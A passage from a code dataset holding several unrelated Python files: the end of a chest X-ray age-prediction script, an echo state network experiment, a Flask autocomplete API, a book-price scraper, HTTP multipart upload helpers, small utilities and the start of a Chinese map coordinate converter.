If split, then split on the Dataset column keeping only the Te values [default: False]\r\n --checkFiles Should we check whether df files actually exist?\r\n --size=SIZE Resize to this size [Default:224]\r\n --saliency=SAL_DIR Directory to write saliency maps to [Default:None]\r\n\"\"\"\r\n\r\nimport os\r\nfrom docopt import docopt\r\nimport pandas as pd\r\nimport fastai\r\nfrom fastai.vision import *\r\nimport pretrainedmodels\r\nfrom sklearn.metrics import *\r\nfrom fastai.callbacks import *\r\nimport math\r\nimport time\r\nimport SimpleArchs\r\nimport GradCAMUtils\r\nfrom PIL import Image\r\nfrom torchvision import transforms\r\n\r\n\r\n###TODO Add optional checkpointing (optional result file to append to, skipping loop iteration if model exists)\r\ntfms_test = get_transforms(do_flip = False,max_warp = None)\r\n\r\n\r\n\r\n \r\ndef _tta_only(learn:Learner, ds_type:DatasetType=DatasetType.Valid, activ:nn.Module=None, scale:float=1.35) -> Iterator[List[Tensor]]:\r\n \"Computes the outputs for several augmented inputs for TTA\"\r\n dl = learn.dl(ds_type)\r\n ds = dl.dataset\r\n old = ds.tfms\r\n #activ = ifnone(activ, _loss_func2activ(learn.loss_func))\r\n augm_tfm = [o for o in learn.data.train_ds.tfms if o.tfm not in\r\n (crop_pad, flip_lr, dihedral, zoom)]\r\n try:\r\n pbar = master_bar(range(8))\r\n for i in pbar:\r\n row = 1 if i&1 else 0\r\n col = 1 if i&2 else 0\r\n #flip = i&4\r\n d = {'row_pct':row, 'col_pct':col, 'is_random':False}\r\n tfm = [*augm_tfm, zoom(scale=scale, **d), crop_pad(**d)]\r\n #if flip: tfm.append(flip_lr(p=1.))\r\n #import pdb; pdb.set_trace()\r\n ds.tfms = tfm\r\n yield get_preds(learn.model, dl, pbar=pbar, activ=activ)[0]\r\n finally: ds.tfms = old\r\n\r\n\r\ndef _TTA(learn:Learner, beta:float=0.4, scale:float=1.35, ds_type:DatasetType=DatasetType.Valid, activ:nn.Module=None, with_loss:bool=False) -> Tensors:\r\n \"Applies TTA to predict on `ds_type` dataset.\"\r\n preds,y = learn.get_preds(ds_type, activ=activ)\r\n all_preds = list(_tta_only(learn,ds_type=ds_type, activ=activ, scale=scale))\r\n avg_preds = torch.stack(all_preds).mean(0)\r\n sd_preds = torch.stack(all_preds).std(0)\r\n if beta is None: return preds,avg_preds,y,sd_preds\r\n else:\r\n final_preds = preds*beta + avg_preds*(1-beta)\r\n if with_loss:\r\n with NoneReduceOnCPU(learn.loss_func) as lf: loss = lf(final_preds, y)\r\n return final_preds, y, loss,sd_preds\r\n return final_preds, y,sd_preds\r\n\r\nnum_workers = 16\r\nbs = 32\r\nif __name__ == '__main__':\r\n\r\n arguments = docopt(__doc__)\r\n ###Grab image directory\r\n image_dir = arguments['']\r\n one = False\r\n \r\n mdl_path = arguments['']\r\n size = int(arguments['--size'])\r\n ###set model architecture\r\n m = arguments['--modelarch'].lower()\r\n if(arguments['--dataframe']==\"None\"):\r\n files = [f for f in os.listdir(image_dir) if os.path.isfile(os.path.join(image_dir,f))] \r\n \r\n if(len(files)==1):\r\n one = True\r\n files.extend(files)\r\n\r\n ###Results\r\n output_df = pd.DataFrame(columns = ['File','Dummy','Prediction'])\r\n \r\n output_df['File'] = files\r\n if(arguments['--type'].lower()==\"discrete\"):\r\n output_df['Dummy'] = np.random.randint(0,2,len(files))\r\n else:\r\n output_df['Dummy'] = np.random.random_sample(len(files))\r\n col = 'Dummy'\r\n else:\r\n output_df = pd.read_csv(arguments['--dataframe'])\r\n locs = []\r\n if(arguments['--checkFiles']):\r\n for i in range(0,output_df.shape[0]):\r\n if(os.path.exists(os.path.join(image_dir,output_df.iloc[i,0]))):\r\n locs.append(i)\r\n else:\r\n print(output_df.iloc[i,0])\r\n output_df = output_df.iloc[locs,:]\r\n \r\n output_df = output_df.reset_index(drop=True) \r\n col = arguments['--target']\r\n \r\n if(arguments[\"--split\"]!=\"False\"):\r\n output_df = output_df[output_df.Dataset==\"Te\",]\r\n if(arguments[\"--type\"].lower()==\"continuous\"):\r\n imgs = (ImageList.from_df(df=output_df,path=image_dir)\r\n .split_none()\r\n .label_from_df(cols=col,label_cls=FloatList)\r\n .transform(tfms_test,size=size)\r\n .databunch(num_workers = num_workers,bs=bs).normalize(imagenet_stats))\r\n else:\r\n imgs = (ImageList.from_df(df=output_df,path=image_dir)\r\n .split_none()\r\n .label_from_df(cols=col)\r\n .transform(tfms_test,size=size)\r\n .databunch(num_workers = num_workers,bs=bs).normalize(imagenet_stats))\r\n \r\n \r\n manual = False\r\n \r\n #Compute # of output nodes\r\n if(arguments['--type'].lower()==\"continuous\"):\r\n out_nodes = 1\r\n else:\r\n out_nodes = 2\r\n \r\n \r\n if(m==\"inceptionv4\"):\r\n def get_model(pretrained=True, model_name = 'inceptionv4', **kwargs ): \r\n if pretrained:\r\n arch = pretrainedmodels.__dict__[model_name](num_classes=1000, pretrained='imagenet')\r\n else:\r\n arch = pretrainedmodels.__dict__[model_name](num_classes=1000, pretrained=None)\r\n return arch\r\n\r\n def get_cadene_model(pretrained=True, **kwargs ): \r\n return fastai_inceptionv4\r\n custom_head = create_head(nf=2048*2, nc=37, ps=0.75, bn_final=False) \r\n fastai_inceptionv4 = nn.Sequential(*list(children(get_model(model_name = 'inceptionv4'))[:-2]),custom_head) \r\n\r\n \r\n ###Based on the input model, create a cnn learner object\r\n \r\n elif(m==\"resnet50\"):\r\n mdl = fastai.vision.models.resnet50\r\n elif(m==\"resnet34\"):\r\n mdl = fastai.vision.models.resnet34\r\n elif(m==\"resnet16\"):\r\n mdl = fastai.vision.models.resnet16\r\n elif(m==\"resnet101\"):\r\n mdl = fastai.vision.models.resnet101\r\n elif(m==\"resnet152\"):\r\n mdl = fastai.vision.models.resnet152\r\n elif(m==\"densenet121\"):\r\n mdl = fastai.vision.models.densenet121\r\n elif(m==\"densenet169\"):\r\n mdl = fastai.vision.models.densenet169\r\n elif(m==\"age\"):\r\n mdl=fastai.vision.models.resnet34\r\n elif(m==\"larget\"):\r\n manual = True\r\n mdl = SimpleArchs.get_simple_model(\"LargeT\",out_nodes)\r\n elif(m==\"largew\"):\r\n manual = True\r\n mdl = SimpleArchs.get_simple_model(\"LargeW\",out_nodes)\r\n elif(m==\"small\"):\r\n manual = True\r\n mdl = SimpleArchs.get_simple_model(\"Small\",out_nodes)\r\n elif(m==\"tiny\"):\r\n manual = True\r\n mdl = SimpleArchs.get_simple_model(\"Tiny\",out_nodes)\r\n elif(m==\"age\"):\r\n mdl = fastai.vision.models.resnet34\r\n else:\r\n print(\"Sorry, model: \" + m + \" is not yet supported... coming soon!\")\r\n quit()\r\n \r\n \r\n \r\n if(m=='inceptionv4'):\r\n learn = cnn_learner(imgs, get_cadene_model, metrics=accuracy)\r\n elif(manual):\r\n learn = Learner(imgs,mdl)\r\n else:\r\n learn = cnn_learner(imgs, mdl, metrics=accuracy)\r\n \r\n if(m==\"age\"):\r\n numFeatures = 16\r\n learn.model[1] = nn.Sequential(*learn.model[1][:-5],nn.Linear(1024,512,bias=True),nn.ReLU(inplace=True),nn.BatchNorm1d(512),nn.Dropout(p=0.5),\r\n nn.Linear(512,numFeatures,bias=True),nn.ReLU(inplace=True),nn.BatchNorm1d(numFeatures),\r\n nn.Linear(numFeatures,1,bias=True)).cuda()\r\n \r\n\r\n N = len(image_dir.split(\"/\"))\r\n dir_fix = \"../\"*(N-1)\r\n learn.model_dir = \".\"\r\n learn.load(os.path.join(dir_fix,mdl_path))\r\n\r\n\r\n\r\n if(arguments['--type'].lower()==\"discrete\"):\r\n preds,y,sd_preds = _TTA(learn,ds_type = DatasetType.Fix,activ=nn.Softmax())\r\n \r\n ###output predictions as column with model name\r\n output_df['Prediction'] = np.array(preds[:,1])\r\n output_df['SD_Prediction'] = np.array(sd_preds[:,1])\r\n else:\r\n preds,y,sd_preds = _TTA(learn,ds_type = DatasetType.Fix)\r\n \r\n ###output predictions as column with model name\r\n output_df['Prediction'] = np.array(preds)\r\n output_df['SD_Prediction'] = np.array(sd_preds)\r\n\r\n learn.data.batch_size = 1\r\n learn.data.valid_dl = imgs.train_dl.new(shuffle=False)\r\n learn.model.eval()\r\n\r\n rc = GradCAMUtils.ResnetCAM(learn.model)\r\n count = 0\r\n #Saliency maps\r\n if(arguments['--saliency'] is not None):\r\n for i in progress_bar(learn.data.valid_dl):\r\n img = i[0]\r\n tmp = img.resize(1,3,224,224).cuda()\r\n tmp.requires_grad_()\r\n pred = rc(tmp)\r\n if(arguments['--type'].lower()==\"continuous\"):\r\n pred.backward()\r\n else:\r\n prob = F.softmax(pred,dim=1)\r\n pred[:,1].backward()\r\n saliency,_ = torch.max(tmp.grad.data.abs(),dim=1)\r\n #import pdb; pdb.set_trace()\r\n filename = output_df.iloc[count,0]\r\n\r\n img = Image.open(os.path.join(image_dir,filename)).convert('RGB')\r\n img = transforms.ToTensor()(img)\r\n new_img = rc.blendImage(saliency[0,:,:].detach().clone().cpu(),img.detach().clone(),alpha=0.5,cmap='hot')\r\n ###Because filenames include full path here\r\n if(len(filename.split(\"/\"))>1):\r\n tmp_fname = filename.split(\"/\")\r\n filename = tmp_fname[len(tmp_fname)-1]\r\n \r\n new_img.save(os.path.join(arguments['--saliency'],filename))\r\n count = count + 1\r\n if(one):\r\n output_df.drop([1])\r\n if(m==\"age\"):\r\n arr = np.array(output_df.Prediction)\r\n arr = arr * 8.03342449139388 + 63.8723890235948\r\n arr = arr * 6.75523 - 0.03771*arr*arr -213.77257 \r\n output_df['CXR_Age'] = arr\r\n output_df = output_df.drop([\"Prediction\"],axis=1)\r\n output_df = output_df.drop([\"Dummy\"],axis=1)\r\n output_df.to_csv(arguments[''])\r\n","repo_name":"circ-ml/CXR-Age","sub_path":"run_model.py","file_name":"run_model.py","file_ext":"py","file_size_in_byte":11176,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"19"} +{"seq_id":"27894886017","text":"from exputils import *\nimport time\nimport pandas as pd\nimport numpy as np\nimport Oger\nimport pylab\nimport mdp\n\ndef DoESN(data, n_test, config):\n try:\n n_in, n_out, res_size, s_radius, leak_rate = config\n sData, ma, mi, me = scale(data)\n \n supData = series_to_supervised(sData, n_in, n_out)\n train,test = train_test_split(supData, n_test)\n train_x, train_y = [np.array(train[:, :n_in])], [np.array(train[:, n_in:])]\n test_x, test_y = [np.array(test[:, :n_in])], [np.array(test[:, n_in:])]\n reservoir = Oger.nodes.LeakyReservoirNode(input_dim=n_in, \n output_dim=res_size, \n spectral_radius=s_radius,\n leak_rate=leak_rate)\n readout = Oger.nodes.RidgeRegressionNode()\n flow = mdp.Flow([reservoir, readout], verbose=1)\n data = [None, zip(train_x,train_y)]\n\n blockPrint()\n t0=time.time()\n flow.train(data)\n train_time = time.time() - t0\n \n t0=time.time()\n y_hat = flow(test_x)\n predi_time = time.time() - t0\n enablePrint()\n\n p_data = unscaleOger(y_hat, ma, mi, me)\n\n rmse = Oger.utils.rmse(unscaleOger(test_y[0], ma, mi, me), p_data)\n\n return rmse, train_time, predi_time, p_data.flatten()\n\n except:\n return None\n\ndef GetConfigsESN():\n n_ins = [5, 10, 20]\n n_outs = [1]\n res_sizes = [50, 100, 200, 400, 600, 1000]\n n_leaking_rate = [0.1, 0.2, 0.3, 0.5, 0.8]\n spectral_rads = [0.1, 0.3, 0.5, 0.7, 0.9]\n # create configs\n configs = list()\n for i in n_ins:\n for j in n_outs:\n for k in res_sizes:\n for l in n_leaking_rate:\n for m in spectral_rads:\n cfg = [i, j, k, l, m]\n configs.append(cfg)\n print('Total configs: %d' % len(configs))\n return configs, ['n_ins', 'n_outs', 'res_sizes', 'n_leaking_rate', 'spectral_rads']\n\nconfigs, configNames = GetConfigsESN()\nRunExp('esn', DoESN, configs, configNames)","repo_name":"oadele3/traffic_prediction","sub_path":"esn.py","file_name":"esn.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17830525476","text":"import time\nfrom flask import Flask\nfrom flask import jsonify\nfrom flask import request\nfrom lib.Suggester import Suggester\n\napp = Flask(__name__)\n\napp.config['PROPAGATE_EXCEPTIONS'] = True\n\nsuggester = Suggester()\n\n\n@app.route(\"/\")\ndef suggest():\n user_input = request.args.get('q')\n response = {\n \"error\": \"Parameter missing\",\n \"message\": \"You've not added required query parameter *q* with the word\",\n \"allowed_params\": {\n \"q\": {\n \"type\": \"required\",\n \"value\": \"string\",\n \"desc\": \"word to auto complete\"\n },\n \"n\": {\n \"type\": \"optional\",\n \"value\": \"positive integer\",\n \"desc\": \"number of auto complete suggestions to return\"\n }\n }\n }\n if user_input:\n try:\n start = time.time()\n num_words = int(request.args.get('n')) if request.args.get('n') else 25\n response = suggester.suggest_for(user_input, num_words)\n end = time.time()\n time_taken = (end - start) * 1000\n return jsonify({'time_taken': str(round(time_taken, 2)) + 'ms', 'total': len(response), 'suggestions': response}), 200\n except ValueError:\n return jsonify({\"error\": \"Input is invalid\"}), 422\n else:\n return jsonify(response), 400\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"apoorvparijat/airbase-autocomplete","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"34736454653","text":"import pandas as pd\nimport requests\n\n\nclass DataFetcher:\n def get_symbol_OHLC_data(\n self, \n data_provider_settings, \n filename, \n asset_symbol,\n source\n ):\n full_filename = asset_symbol + \"_\" + filename\n api_response = None\n \n if source == \"alpha_vantage_api\":\n api_response = requests.get(f'{data_provider_settings[\"ALPHA_VANTAGE_API_URL\"]}{data_provider_settings[\"ALPHA_VANTAGE_FUNCTION\"]}&symbol={asset_symbol}&apikey={data_provider_settings[\"ALPHA_VANTAGE_API_KEY\"]}&outputsize={data_provider_settings[\"ALPHA_VANTAGE_TIME_SERIES_LENGTH\"]}&datatype=csv')\n if source == \"internal_web_scraping_service\":\n api_response = requests.get(f'http://localhost:2000/getSymbolOHLCTimeSeries/{asset_symbol}') \n data_file = open(full_filename, 'wb')\n data_file.write(api_response.content)\n \n\n df = pd.read_csv(\n full_filename, \n sep = ',',\n parse_dates = [\"timestamp\"]\n )\n df = df.dropna(subset = [\"timestamp\"])\n pd.to_datetime(df[\"timestamp\"])\n return df\n\n\n def get_period_of_time_series(\n self, \n data, \n start_date, \n end_date\n ):\n data_after_start_date = data[data[\"timestamp\"] > pd.Timestamp(start_date)]\n data_until_end_date = data_after_start_date[data_after_start_date[\"timestamp\"] < pd.Timestamp(end_date)]\n return data_until_end_date.drop_duplicates()","repo_name":"asparuhkostov/algo-trading-workbench","sub_path":"backtesting/strategizer/DataFetcher.py","file_name":"DataFetcher.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18885990020","text":"__author__ = 'zhwang.kevin'\nimport os, sys\nimport http.client, urllib, urllib.request\n\n\ndef encode_multipart_formdata(fields):\n '''''\n 该函数用于拼接multipart/form-data类型的http请求中body部分的内容\n 返回拼接好的body内容及Content-Type的头定义\n '''\n import random\n import os\n\n BOUNDARY = '----------%s' % ''.join(random.sample('0123456789abcdef', 15))\n CRLF = b'\\r\\n'\n L = []\n for key, value in fields.items():\n if (type(value) == type(['abc', 'der'])):\n pass\n else:\n value = [value]\n for item in value:\n filepath = isfiledata(item)\n if filepath:\n L.append(('--' + BOUNDARY).encode('UTF8'))\n L.append(('Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"' % (\n key, os.path.basename(filepath))).encode('UTF8'))\n L.append(('Content-Type: %s' % get_content_type(filepath)).encode('UTF8'))\n L.append(''.encode('UTF8'))\n L.append(ReadFileAsContent(filepath))\n else:\n L.append(('--' + BOUNDARY).encode('UTF8'))\n L.append(('Content-Disposition: form-data; name=\"%s\"' % key).encode('UTF8'))\n L.append(''.encode('UTF8'))\n L.append(item.encode('UTF8'))\n L.append(('--' + BOUNDARY + '--').encode('UTF8'))\n L.append(''.encode('UTF8'))\n\n # for abcd in L:\n # body=body+abcd+CRLF\n\n body = CRLF.join(L)\n content_type = 'multipart/form-data; boundary=%s' % BOUNDARY\n return content_type, body\n\n\ndef encode_multipart_formdata_onefile(fields):\n '''''\n 该函数用于拼接multipart/form-data类型的http请求中body部分的内容\n 返回拼接好的body内容及Content-Type的头定义\n '''\n import random\n import os\n\n BOUNDARY = '----------%s' % ''.join(random.sample('0123456789abcdef', 15))\n CRLF = b'\\r\\n'\n L = []\n for key, value in fields.items():\n if (type(value) == type(['abc', 'der'])):\n pass\n else:\n value = [value]\n for item in value:\n L.append(('--' + BOUNDARY).encode('UTF8'))\n L.append(\n ('Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"' % (key, 'spots.jpg')).encode(\n 'UTF8'))\n L.append(('Content-Type: image/jpeg' ).encode('UTF8'))\n L.append(''.encode('UTF8'))\n L.append(item)\n\n L.append(('--' + BOUNDARY + '--').encode('UTF8'))\n L.append(''.encode('UTF8'))\n\n # for abcd in L:\n # body=body+abcd+CRLF\n\n body = CRLF.join(L)\n content_type = 'multipart/form-data; boundary=%s' % BOUNDARY\n return content_type, body\n\n\ndef get_content_type(filename):\n import mimetypes\n\n return mimetypes.guess_type(filename)[0] or 'application/octet-stream'\n\n\ndef isfiledata(p_str):\n # import re\n rert = os.path.exists(p_str)\n # r_c = re.compile(\"^f'(.*)'$\")\n # rert = r_c.search(str(p_str))\n # rert = re.search(\"^f'(.*)'$\", p_str)\n if rert:\n return p_str\n else:\n return None\n\n\ndef ReadFileAsContent(filename):\n # print filename\n try:\n with open(filename, 'rb') as f:\n filecontent = f.read()\n except Exception as e:\n print('The Error Message in ReadFileAsContent(): ' + e.message)\n return ''\n return filecontent\n\n\ndef gethttp(host, port, url):\n httpClient = None\n try:\n httpClient = http.client.HTTPConnection(host, port, timeout=300)\n httpClient.request('GET', url, None, {'Content-Type': 'text/html; charset=utf-8'})\n # response是HTTPResponse对象\n response = httpClient.getresponse()\n # print(response.status)\n # print(response.reason)\n # #此处很重要,decode必不可少\n strrespose = response.read().decode('utf-8')\n # print(strrespose)\n return strrespose\n except Exception as e:\n print(e)\n finally:\n if httpClient:\n httpClient.close()\n\n\ndef posthttp(form, url):\n httpClient = None\n\n try:\n contenttype, body = encode_multipart_formdata(form)\n headers = {\"Content-type\": contenttype,\n \"Accept\": \"application/json;charset=UTF-8\"}\n req = urllib.request.Request(url=url, data=body, headers=headers)\n # print(req)\n res_data = urllib.request.urlopen(req)\n jsonstr = res_data.read().decode('utf-8')\n # print(jsonstr)\n # print(res_data.status)\n # print(res_data.reason)\n # print(res_data.getheaders()) # 获取头信息\n return jsonstr\n except Exception as e:\n print(e)\n\n finally:\n if httpClient:\n httpClient.close()\n\ndef posthttp_onefile(form, url):\n httpClient = None\n\n try:\n contenttype, body = encode_multipart_formdata_onefile(form)\n headers = {\"Content-type\": contenttype,\n \"Accept\": \"application/json;charset=UTF-8\"}\n req = urllib.request.Request(url=url, data=body, headers=headers)\n res_data = urllib.request.urlopen(req)\n jsonstr = res_data.read().decode('utf-8')\n return jsonstr\n except Exception as e:\n print(e)\n finally:\n if httpClient:\n httpClient.close()\n","repo_name":"coolcoldboy/PythonSub","sub_path":"PostGetHttp.py","file_name":"PostGetHttp.py","file_ext":"py","file_size_in_byte":5314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38997395650","text":"import sys\nfrom collections import Counter\n\ninput = sys.stdin.readline\n\nN, M, B = map(int, input().split())\nC = Counter()\nfor _ in range(N):\n C += Counter(map(int, input().split()))\nT, H = sys.maxsize, 0\nkeys = list(C.keys())\n\nfor h in range(257):\n t = 0\n op1, op2 = 0, 0\n\n for k in keys:\n if k < h:\n op2 += C[k] * (h-k)\n elif k > h:\n op1 += C[k] * (k-h)\n\n if op2 > op1 + B:\n continue\n else:\n t = op1 * 2 + op2\n\n if t < T:\n T, H = t, h\n elif t == T and h > H:\n H = h\n\nprint(T, H)\n","repo_name":"minyeamer/til","sub_path":"algorithm/baekjoon/02-silver/n18111.py","file_name":"n18111.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"13266294805","text":"from typing import NamedTuple\nimport requests\nfrom lxml import html\n\n\nclass BookObject(NamedTuple):\n title: str\n price: float\n link: str\n store: str\n\n def __str__(self):\n return '价格: {self.price}, 名称: {self.title}, 链接:{self.link}, 店铺:{self.store}'.format(self=self)\n\n\nclass Spider_Book(object):\n def __init__(self, sn):\n self.sn = sn\n self.book_list = []\n\n def spider_dangdang(self):\n self.dd_url = 'http://search.dangdang.com/?key={isbn}&act=input'.format(isbn = self.sn)\n # 获取html文本\n respones = requests.get(self.dd_url)\n html_str = respones.text\n # 使用lxml获取html元素对象\n selector = html.fromstring(html_str)\n # 对象调用xpath()获取标签内容\n ul_list = selector.xpath('//div[@id=\"search_nature_rg\"]/ul/li')\n for li in ul_list:\n # 获取名字\n title = li.xpath('p[@class=\"name\"]/a/@title')\n # 获取链接\n link = li.xpath('p[@class=\"name\"]/a/@href')\n # 获取价格\n now_price = li.xpath('p[@class=\"price\"]/span[@class=\"search_now_price\"]/text()')\n if len(now_price) == 0:\n now_price_bug = li.xpath('div[@class=\"ebook_buy\"]/p/span[@class=\"search_now_price\"]/text()')\n now_price = now_price_bug\n # 获取店铺\n store = li.xpath('p[@class=\"search_shangjia\"]/a[@name=\"itemlist-shop-name\"]/text()')\n if store == []:\n store.append('当当自营')\n book = BookObject(\n title= title[0],\n price= now_price[0].replace('¥', ''),\n link= link[0],\n store= store[0]\n )\n self.book_list.append(book)\n def spider_jd(self):\n self.jd_url = 'https://search.jd.com/Search?keyword={isbn}&enc=utf-8'.format(isbn = self.sn)\n # 获取html文本\n respones = requests.get(self.jd_url)\n respones.encoding = 'utf-8'\n html_str = respones.text\n # 使用lxml获取html元素对象\n selector = html.fromstring(html_str)\n # 对象调用xpath()获取标签内容\n ul_list = selector.xpath('//div[@id=\"J_goodsList\"]/ul/li')\n # print(len(ul_list))\n for li in ul_list:\n # 获取名字\n title = li.xpath('div[@class=\"gl-i-wrap\"]/div[@class=\"p-name\"]/a/em/text()')\n # 获取链接\n link = li.xpath('div[@class=\"gl-i-wrap\"]/div[@class=\"p-name\"]/a/@href')\n link[0] = 'http:{0}'.format(link[0])\n # 获取价格\n now_price = li.xpath('div[@class=\"gl-i-wrap\"]/div[@class=\"p-price\"]/strong/i/text()')\n # 获取店铺\n store = li.xpath('div[@class=\"gl-i-wrap\"]/div[@class=\"p-shopnum\"]/a/text()')\n if store == []:\n store.append('京东自营')\n book = BookObject(\n title=title[0],\n price=now_price[0].replace('¥', ''),\n link=link[0],\n store=store[0]\n )\n self.book_list.append(book)\n def spider_yhd(self):\n self.yhd_url = 'https://search.yhd.com/c0-0/k{isbn}/'.format(isbn = self.sn)\n # 获取html文本\n respones = requests.get(self.yhd_url)\n html_str = respones.text\n # 使用lxml获取html元素对象\n selector = html.fromstring(html_str)\n # 对象调用xpath()获取标签内容\n ul_list = selector.xpath('//div[@id=\"itemSearchList\"]/div')\n for li in ul_list:\n # 获取名字\n title = li.xpath('div/p[@class=\"proName clearfix\"]/a/@title')\n # 获取链接\n link = li.xpath('div/p[@class=\"proName clearfix\"]/a/@href')\n link[0] = 'http:{0}'.format(link[0])\n # 获取价格\n now_price = li.xpath('div/p[@class=\"proPrice\"]/em/@yhdprice')\n # 获取店铺\n store = li.xpath('div/p[@class=\"storeName limit_width\"]/a/text()')\n if store == []:\n store.append('1号店自营')\n else:\n store[0] = store[0].replace('\\n', '')\n book = BookObject(\n title=title[0],\n price=now_price[0].replace('¥', ''),\n link=link[0],\n store=store[0]\n )\n self.book_list.append(book)\n def sorted_price(self):\n self.spider_dangdang()\n self.spider_jd()\n self.spider_yhd()\n sorted_book_list = sorted(self.book_list, key=lambda item: float(item.price), reverse=True)\n print('>>>>>>>>>', len(sorted_book_list))\n for book in sorted_book_list:\n print(book)\n\n\nif __name__ == '__main__':\n # 9787115428028\n ISBN = input(\"请输入要查找图书的ISBN编码:\")\n rest = Spider_Book(ISBN)\n rest.sorted_price()","repo_name":"JIANJIE97/study","sub_path":"spider_book/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":4905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73086871082","text":"import datetime\nimport re\n\nfrom common.scripts import utils\n\n\ndef clean_date(raw_input): # noqa: C901\n if not isinstance(raw_input, str):\n raw_input = str(raw_input)\n if utils.is_empty(raw_input):\n return \"\"\n\n date = None\n\n # Correct format\n try: # nosec\n pattern = re.compile(\n r\"([0-9]([0-9]([0-9][1-9]|[1-9]0)|[1-9]00)|[1-9]000)\"\n r\"(-(0[1-9]|1[0-2])(-(0[1-9]|[1-2][0-9]|3[0-1])(T([01][0-9]|2[0-3])\"\n r\":[0-5][0-9]:([0-5][0-9]|60)(\\.[0-9]+)?(Z|(\\+|-)((0[0-9]|1[0-3]):\"\n r\"[0-5][0-9]|14:00)))?)?)?\"\n )\n full_match = re.fullmatch(raw_input, pattern)\n date = datetime.datetime.strptime(full_match.group(0)[0:10], \"%Y-%m-%d\")\n except Exception:\n pass\n\n formats = [\n \"%Y%m%d%H%M\",\n \"%Y-%m-%d %H:%M:%S\",\n \"%Y-%m-%dT%H:%M:%S\",\n \"%Y-%m-%dT%H:%M:%S%z\",\n \"%a, %d %b %Y %H:%M:%S %Z\",\n \"%Y-%m-%d\",\n \"%Y%m%d\",\n \"%Y-%m\",\n \"%Y%m\",\n \"%Y\",\n ]\n for fmt in formats:\n try:\n date = datetime.datetime.strptime(raw_input, fmt)\n except ValueError:\n continue\n\n if date is None:\n return raw_input\n\n # We only want the date\n return date.isoformat().split(\"T\")[0]\n","repo_name":"arkhn/fhir-river","sub_path":"django/common/scripts/cleaning/clean_date.py","file_name":"clean_date.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"19"} +{"seq_id":"236171690","text":"data1 = [\"place1\",\"Northern Utah\",\"Sports\",5,1,1]\r\ndata2 = [\"place2\",\"Western Utah\",\"Food\",6,1,1]\r\ndata3 = [\"place3\",\"Salt Lake Area\",\"Nature / Outdoor\",7,1,1]\r\ndata4 = [\"place4\",\"Southwestern\",\"Cultural / Historical\",5,1,4]\r\ndata5 = [\"place5\",\"Northern Utah\",\"Entertainment\",5,1,4]\r\ndata6 = [\"place6\",\"Northern Utah\",\"Sports\",5,2,4]\r\n\r\nallAttractions = [data1, data2, data3, data4, data5, data6]\r\nchosenAttractions = []\r\n\r\n\r\n#old format:\r\n#[\"name\", visitors, rating, price, type, safety]\r\n","repo_name":"thomaslu678/PythonGUI","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31537162232","text":"# encoding: utf-8\r\nfrom __future__ import absolute_import, unicode_literals, division\r\n\r\nimport math\r\n\r\n\r\nclass CoordConvert(object):\r\n X_PI = math.pi * 3000 / 180\r\n A = 6378245\r\n EE = 0.00669342162296594323\r\n\r\n @classmethod\r\n def gcj02_to_bd09(cls, longitude, latitude):\r\n \"\"\"\r\n GCJ02(火星坐标系)转BD09(百度坐标系)\r\n\r\n :param longitude: GCJ02经度\r\n :param latitude: GCJ02纬度\r\n :return: BD09经度,BD09纬度\r\n \"\"\"\r\n z = math.sqrt(longitude * longitude + latitude * latitude) + 0.00002 * math.sin(latitude * cls.X_PI)\r\n theta = math.atan2(latitude, longitude) + 0.000003 * math.cos(longitude * cls.X_PI)\r\n longitude = z * math.cos(theta) + 0.0065\r\n latitude = z * math.sin(theta) + 0.006\r\n return longitude, latitude\r\n\r\n @classmethod\r\n def bd09_to_gcj02(cls, longitude, latitude):\r\n \"\"\"\r\n BD-09(百度坐标系)转GCJ02(火星坐标系)\r\n\r\n :param longitude: BD09经度\r\n :param latitude: BD09纬度\r\n :return: GCJ02经度, GCJ02纬度\r\n \"\"\"\r\n x = longitude - 0.0065\r\n y = latitude - 0.006\r\n z = math.sqrt(x * x + y * y) - 0.00002 * math.sin(y * cls.X_PI)\r\n theta = math.atan2(y, x) - 0.000003 * math.cos(x * cls.X_PI)\r\n longitude = z * math.cos(theta)\r\n latitude = z * math.sin(theta)\r\n return longitude, latitude\r\n\r\n @classmethod\r\n def wgs84_to_gcj02(cls, longitude, latitude):\r\n \"\"\"\r\n WGS84转GCJ02(火星坐标系)\r\n\r\n :param longitude: WGS84经度\r\n :param latitude: WGS84纬度\r\n :return: GCJ02经度, GCJ02纬度\r\n \"\"\"\r\n if not cls.in_china(longitude, latitude):\r\n return longitude, latitude\r\n longitude_add, latitude_add = cls._transform(longitude - 105, latitude - 35)\r\n\r\n rad_latitude = latitude / 180 * math.pi\r\n magic = math.sin(rad_latitude)\r\n magic = 1 - cls.EE * magic * magic\r\n sqrt_magic = math.sqrt(magic)\r\n latitude_add = (latitude_add * 180) / ((cls.A * (1 - cls.EE)) / (magic * sqrt_magic) * math.pi)\r\n longitude_add = (longitude_add * 180) / (cls.A / sqrt_magic * math.cos(rad_latitude) * math.pi)\r\n latitude += latitude_add\r\n longitude += longitude_add\r\n return longitude, latitude\r\n\r\n @classmethod\r\n def wgs84_to_bd09(cls, longitude, latitude):\r\n \"\"\"\r\n WGS84转BD09(百度坐标系)\r\n\r\n :param longitude: GCJ02经度\r\n :param latitude: GCJ02纬度\r\n :return: BD09经度,BD09纬度\r\n 